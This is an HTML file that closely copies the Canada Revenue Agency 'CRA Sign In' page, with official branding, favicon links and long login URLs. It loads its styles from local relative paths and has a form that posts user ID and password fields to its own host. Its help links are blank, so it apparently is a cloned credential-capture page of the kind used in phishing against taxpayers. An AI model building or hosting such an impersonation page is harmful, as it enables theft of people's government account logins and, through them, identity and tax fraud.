<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Canada Revenue Agency - CRA Sign In</title>
    <link rel="apple-touch-icon" sizes="57x57 72x72 114x114 144x144 150x150" class="wb-favicon" href="https://cms-sgj.cra-arc.gc.ca/ebci/wet/v13.7.2/GCWeb/assets/favicon-mobile.png"><link href="https://cms-sgj.cra-arc.gc.ca/ebci/wet/v13.7.2/GCWeb/assets/favicon.ico" rel="icon" type="image/x-icon" class="wb-init wb-favicon-inited">
    <link rel="stylesheet" href="../static/css/theme.min.css"> <!-- Link to your CSS file -->
    <link rel="stylesheet" href="../static/css/common.css"> <!-- Additional CSS -->
    <link rel="stylesheet" href="../static/css/apps.css"> <!-- Additional CSS -->
</head>
<body>
	<header>
        <div id="wb-bnr" class="container">
            <section id="wb-lng" class="visible-md visible-lg text-right">
            </section>
            <div class="row">
                
                <div class="brand col-xs-9 col-sm-5 col-md-4" property="publisher" resource="#wb-publisher" typeof="GovernmentOrganization">
	                
	                <img alt="" src="../static/images/sig-blk-en.svg" property="logo">
	                <span class="wb-inv" property="name"> Government of Canada / <span lang="fr">Gouvernement du Canada</span></span>
	                <meta property="name" content="Government of Canada">
	                <meta property="areaServed" typeof="Country" content="Canada">
	                <link property="logo" href="../static/images/wmms-blk.svg">
            	</div>
                <section class="wb-mb-links col-xs-4 col-sm-3 visible-sm visible-xs" id="wb-glb-mn">
                    
                    <h2>Menu</h2>
                    <ul class="list-inline text-right chvrn">
                        <li>
                        	
                            <a href="https://cms-sgj.cra-arc.gc.ca/gol-ged/awsc/cms/login?TYPE=33554432&amp;REALMOID=06-26a97681-2e5a-105d-9505-84cb2b4afb5e&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=-SM-99NPbkR6OPslJt9GONbs49TeUejhkkGfSuwk7v%2bklNYS7onWEUdR4ACMKCOpofyHX0qU9kBIgtz9h8KYWk65wYqTcAv%2fA1UOC%2fQztpHnfiDqkDeSpp8%2f3VBR3608Otm5&amp;TARGET=-SM-HTTP%3a%2f%2fcms--sgj%2ecra--arc%2egc%2eca%2fgol--ged%2fawsc%2fcms%2fmacauth%3fTYPE%3d33554432%26REALMOID%3d06--00ba5d0a--2e5a--105d--9505--84cb2b4afb5e%26GUID%3d%26SMAUTHREASON%3d0%26METHOD%3dGET%26SMAGENTNAME%3d--SM--99NPbkR6OPslJt9GONbs49TeUejhkkGfSuwk7v-%2bklNYS7onWEUdR4ACMKCOpofyHX0qU9kBIgtz9h8KYWk65wYqTcAv-%2fA1UOC-%2fQztpHnfiDqkDeSpp8-%2f3VBR3608Otm5%26TARGET%3d--SM--HTTP-%3a-%2f-%2fcms----sgj-%2ecra----arc-%2egc-%2eca-%2fgol----ged-%2fawsc-%2fcms-%2fpostlogin-%3fSAMLRequest-%3dfZDBTsMwEETv---%2FQrL98SxaUlqJZEqVUiVQEKAOHBBG9dJjRw7eB3g83HDoXBhj6Od3XlT7---%2BZ4cg---%2F6fdYYyddoHTZ0Dk56QIPSwahRRiUfd3e3UuSFnIKPXnlLyT45jINovGvoKcYJJWNqxAyHt1wFyCCofFC5grP6iWyaO2sUQxitQPSU3Pig9BKgoT1Y1JQc9g197dRVtam6ErYbVZZ6y6---%2F7I2h---%2BLKBYi74XVSk2aRXvAdF86IsZcdYHhxFcbKgoxDrjPBPlkygkr6SoXih51gGXxAmGtiuSpnbI5eINPw3IJPzfQnqsw5mcttYPxuWwcMNf7ppdLrermv3uuv0G-%26RelayState-%3d3337369df3e0a7a221b0a8cce5a1a1ffa5fea1ec-%26SigAlg-%3dhttp---%3A---%2F---%2Fwww-%2ew3-%2eorg---%2F2001---%2F04---%2Fxmldsig----more---%23rsa----sha256-%26Signature-%3dXNx6QCqHTXxClTG6RDKQFJ96dF7GzrPGjAvyKxA2FAOJN0u8I34SlXzRUr2rl2mI9AgQ4xMYQpfj5gtcPQezYhMlkXMRx7JcEnGACR6X5o---%2FuaRACqYDWiTjfSDIoSKfxcXr3SGNCFSVtLFUhwunA5hCGFwHcom---%2Bch3VKx1SkaXBTUmNwgNQTryz1C35nBu7ilj2zGjsas0yeq9oihL78an0RnEGTWaVbtjuTD5lY---%2BJuC2083VFcEL1VQlQvWR8zv0VnmIJAjlzM4ACMWMNbhG---%2BidFUlaZ1EabLwHiOyiC---%2B4Z9c---%2ByVU3Ijb6De4DCrYx9mUrJG3EFy---%2BRrDN5Z46iE4w---%3D---%3D-%26SMPORTALURL-%3d3s3oC2jIJ0qEQ12Yiq9kAEjDKEUuKufwTJYavzvDtmH65tOSqAjOcKBbNnWrHFISoEmNt55oyAIlNgDZ---%2FeXB9Z---%2Fegu2zyozy#mb-pnl" class="overlay-lnk" title="Menu" role="button" aria-controls="mb-pnl"><span class="glyphicon glyphicon-th-list">
                                    <span class="wb-inv">Menu</span>
                                </span></a>
                        </li>
                    </ul>
                    <div id="mb-pnl" class=" wb-overlay modal-content overlay-def wb-panel-r wb-overlay-inited" aria-hidden="true"><header class="modal-header"><div class="modal-title">Menu</div></header><div class="modal-body"><section class="lng-ofr"><h3>Language selection</h3><ul class="list-inline">
                        
                    </ul></section><nav role="navigation" typeof="SiteNavigationElement" id="info-pnl" class="info-pnl wb-menu wb-menu-inited wb-init"><h3>About this site</h3><ul class="list-unstyled mb-menu" role="menu"><li class="no-sect"><a class="mb-item" role="menuitem" aria-setsize="3" aria-posinset="1" tabindex="0" href="https://www.canada.ca/en/transparency/terms.html" rel="noopener noreferrer" target="_blank">Terms and conditions</a></li><li class="no-sect"><a class="mb-item" role="menuitem" aria-setsize="3" aria-posinset="2" tabindex="-1" href="https://www.canada.ca/en/transparency/privacy.html" rel="noopener noreferrer" target="_blank">Privacy</a></li><li class="no-sect"><a class="mb-item" role="menuitem" aria-setsize="3" aria-posinset="3" tabindex="-1" href="https://cms-sgj.cra-arc.gc.ca/gol-ged/awsc/cms/login?TYPE=33554432&amp;REALMOID=06-26a97681-2e5a-105d-9505-84cb2b4afb5e&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=-SM-99NPbkR6OPslJt9GONbs49TeUejhkkGfSuwk7v%2bklNYS7onWEUdR4ACMKCOpofyHX0qU9kBIgtz9h8KYWk65wYqTcAv%2fA1UOC%2fQztpHnfiDqkDeSpp8%2f3VBR3608Otm5&amp;TARGET=-SM-HTTP%3a%2f%2fcms--sgj%2ecra--arc%2egc%2eca%2fgol--ged%2fawsc%2fcms%2fmacauth%3fTYPE%3d33554432%26REALMOID%3d06--00ba5d0a--2e5a--105d--9505--84cb2b4afb5e%26GUID%3d%26SMAUTHREASON%3d0%26METHOD%3dGET%26SMAGENTNAME%3d--SM--99NPbkR6OPslJt9GONbs49TeUejhkkGfSuwk7v-%2bklNYS7onWEUdR4ACMKCOpofyHX0qU9kBIgtz9h8KYWk65wYqTcAv-%2fA1UOC-%2fQztpHnfiDqkDeSpp8-%2f3VBR3608Otm5%26TARGET%3d--SM--HTTP-%3a-%2f-%2fcms----sgj-%2ecra----arc-%2egc-%2eca-%2fgol----ged-%2fawsc-%2fcms-%2fpostlogin-%3fSAMLRequest-%3dfZDBTsMwEETv---%2FQrL98SxaUlqJZEqVUiVQEKAOHBBG9dJjRw7eB3g83HDoXBhj6Od3XlT7---%2BZ4cg---%2F6fdYYyddoHTZ0Dk56QIPSwahRRiUfd3e3UuSFnIKPXnlLyT45jINovGvoKcYJJWNqxAyHt1wFyCCofFC5grP6iWyaO2sUQxitQPSU3Pig9BKgoT1Y1JQc9g197dRVtam6ErYbVZZ6y6---%2F7I2h---%2BLKBYi74XVSk2aRXvAdF86IsZcdYHhxFcbKgoxDrjPBPlkygkr6SoXih51gGXxAmGtiuSpnbI5eINPw3IJPzfQnqsw5mcttYPxuWwcMNf7ppdLrermv3uuv0G-%26RelayState-%3d3337369df3e0a7a221b0a8cce5a1a1ffa5fea1ec-%26SigAlg-%3dhttp---%3A---%2F---%2Fwww-%2ew3-%2eorg---%2F2001---%2F04---%2Fxmldsig----more---%23rsa----sha256-%26Signature-%3dXNx6QCqHTXxClTG6RDKQFJ96dF7GzrPGjAvyKxA2FAOJN0u8I34SlXzRUr2rl2mI9AgQ4xMYQpfj5gtcPQezYhMlkXMRx7JcEnGACR6X5o---%2FuaRACqYDWiTjfSDIoSKfxcXr3SGNCFSVtLFUhwunA5hCGFwHcom---%2Bch3VKx1SkaXBTUmNwgNQTryz1C35nBu7ilj2zGjsas0yeq9oihL78an0RnEGTWaVbtjuTD5lY---%2BJuC2083VFcEL1VQlQvWR8zv0VnmIJAjlzM4ACMWMNbhG---%2BidFUlaZ1EabLwHiOyiC---%2B4Z9c---%2ByVU3Ijb6De4DCrYx9mUrJG3EFy---%2BRrDN5Z46iE4w---%3D---%3D-%26SMPORTALURL-%3d3s3oC2jIJ0qEQ12Yiq9kAEjDKEUuKufwTJYavzvDtmH65tOSqAjOcKBbNnWrHFISoEmNt55oyAIlNgDZ---%2FeXB9Z---%2Fegu2zyozy#web-cont">Top of Page <span class="glyphicon glyphicon-chevron-up"></span></a></li></ul></nav></div><div class="modal-footer"><button title="Close overlay" class="btn btn-sm btn-primary pull-left overlay-close" type="button">Close<span class="wb-inv">Close overlay</span></button></div><button title="Close: Menu (escape key)" class="mfp-close overlay-close" type="button">�<span class="wb-inv"> Close: Menu (escape key)</span></button></div>
                </section>
                
            </div>
        </div>
		
		
		
		<div id="brand-container-cra">
			<div class="container">
				<div class="row">
					<div class="col-xs-12 col-sm-10" id="brand-text-cra">
						Canada Revenue Agency
					</div>
					
					<div class="col-xs-4 col-sm-2 text-right">
						
					</div>
				</div>
			</div>
		</div>
		
		
        
        <span data-trgt="mb-pnl" class="wb-menu hide wb-init wb-menu-inited wb-navcurr-inited" id="wb-auto-2"></span>
    </header>

    <main role="main" class="container">
        <h1 id="wb-cont">CRA Sign In</h1>
        <form id="loginForm" method="post" autocomplete="off">
            <div class="form-group">
                <label for="userid" class="required">User  ID <strong class="required"><i>(required)</i></strong></label>
                <input type="text" name="USERID" id="userid" class="form-control" autocomplete="off" required>
                <p><a href="">Forgot your user ID?</a></p>
            </div>
            <div class="form-group">
                <label for="password" class="required">Password <strong class="required"><i>(required)</i></strong></label>
                <input type="password" name="PASSWORD" id="password" class="form-control" autocomplete="off" required>
                <p><a href="">Forgot your password?</a></p>
            </div>

            <p>
                For more information on how your privacy is protected, refer to our <a href="">Personal Information Collection Statement</a>. 
            </p>

            <div class="form-actions">
                <input type="submit" value="Sign In" class="btn btn-primary">
                <input type="button" value="Exit" class="btn btn-default" onclick="window.location.href='https://www.canada.ca/en/revenue-agency.html'">
            </div>
        </form>
        <p>To <a href="">register</a> if you are a new user.</p>
        <p>To <a href="">revoke or change your CRA user ID or password, or to manage your security questions and answers</a>, you must first sign in.</p>

        <div id="pageLabel">Screen ID: CMS.30</div>
        
	




	
	<div>
	    <dl id="wb-dtmd" property="dateModified">
	        <dt>Date modified: </dt>
	        <dd><time>2024-10-21</time></dd>
	    </dl>
	</div>

    </main>

    <footer id="wb-info" class=" wb-navcurr-inited">
	
	
	
	
        <div class="brand" style="border-top:4px solid #335175">
            <div class="container">
                <div class="row ">
                    <nav class="col-md-10 ftr-urlt-lnk">
                        <h2 class="wb-inv">About this site</h2>
                        <ul>
                            
                            
                            
                            <li><a href="">Terms and conditions</a></li>
                            
                            <li><a href="">Privacy</a></li>
                        </ul>
                    </nav>
                    <div class="col-xs-6 visible-sm visible-xs tofpg">
                          
                        <a href="https://cms-sgj.cra-arc.gc.ca/gol-ged/awsc/cms/login?TYPE=33554432&amp;REALMOID=06-26a97681-2e5a-105d-9505-84cb2b4afb5e&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=-SM-99NPbkR6OPslJt9GONbs49TeUejhkkGfSuwk7v%2bklNYS7onWEUdR4ACMKCOpofyHX0qU9kBIgtz9h8KYWk65wYqTcAv%2fA1UOC%2fQztpHnfiDqkDeSpp8%2f3VBR3608Otm5&amp;TARGET=-SM-HTTP%3a%2f%2fcms--sgj%2ecra--arc%2egc%2eca%2fgol--ged%2fawsc%2fcms%2fmacauth%3fTYPE%3d33554432%26REALMOID%3d06--00ba5d0a--2e5a--105d--9505--84cb2b4afb5e%26GUID%3d%26SMAUTHREASON%3d0%26METHOD%3dGET%26SMAGENTNAME%3d--SM--99NPbkR6OPslJt9GONbs49TeUejhkkGfSuwk7v-%2bklNYS7onWEUdR4ACMKCOpofyHX0qU9kBIgtz9h8KYWk65wYqTcAv-%2fA1UOC-%2fQztpHnfiDqkDeSpp8-%2f3VBR3608Otm5%26TARGET%3d--SM--HTTP-%3a-%2f-%2fcms----sgj-%2ecra----arc-%2egc-%2eca-%2fgol----ged-%2fawsc-%2fcms-%2fpostlogin-%3fSAMLRequest-%3dfZDBTsMwEETv---%2FQrL98SxaUlqJZEqVUiVQEKAOHBBG9dJjRw7eB3g83HDoXBhj6Od3XlT7---%2BZ4cg---%2F6fdYYyddoHTZ0Dk56QIPSwahRRiUfd3e3UuSFnIKPXnlLyT45jINovGvoKcYJJWNqxAyHt1wFyCCofFC5grP6iWyaO2sUQxitQPSU3Pig9BKgoT1Y1JQc9g197dRVtam6ErYbVZZ6y6---%2F7I2h---%2BLKBYi74XVSk2aRXvAdF86IsZcdYHhxFcbKgoxDrjPBPlkygkr6SoXih51gGXxAmGtiuSpnbI5eINPw3IJPzfQnqsw5mcttYPxuWwcMNf7ppdLrermv3uuv0G-%26RelayState-%3d3337369df3e0a7a221b0a8cce5a1a1ffa5fea1ec-%26SigAlg-%3dhttp---%3A---%2F---%2Fwww-%2ew3-%2eorg---%2F2001---%2F04---%2Fxmldsig----more---%23rsa----sha256-%26Signature-%3dXNx6QCqHTXxClTG6RDKQFJ96dF7GzrPGjAvyKxA2FAOJN0u8I34SlXzRUr2rl2mI9AgQ4xMYQpfj5gtcPQezYhMlkXMRx7JcEnGACR6X5o---%2FuaRACqYDWiTjfSDIoSKfxcXr3SGNCFSVtLFUhwunA5hCGFwHcom---%2Bch3VKx1SkaXBTUmNwgNQTryz1C35nBu7ilj2zGjsas0yeq9oihL78an0RnEGTWaVbtjuTD5lY---%2BJuC2083VFcEL1VQlQvWR8zv0VnmIJAjlzM4ACMWMNbhG---%2BidFUlaZ1EabLwHiOyiC---%2B4Z9c---%2ByVU3Ijb6De4DCrYx9mUrJG3EFy---%2BRrDN5Z46iE4w---%3D---%3D-%26SMPORTALURL-%3d3s3oC2jIJ0qEQ12Yiq9kAEjDKEUuKufwTJYavzvDtmH65tOSqAjOcKBbNnWrHFISoEmNt55oyAIlNgDZ---%2FeXB9Z---%2Fegu2zyozy#web-cont">Top of Page <span class="glyphicon glyphicon-chevron-up"></span></a>
                    </div>
                  <div class="col-xs-6 col-md-3 col-lg-2 text-right">
                    <img src="../static/images/wmms-blk.svg" alt="Symbol of the Government of Canada">
                </div>
                </div>
            </div>
        </div>
    </footer>

</body>
</html>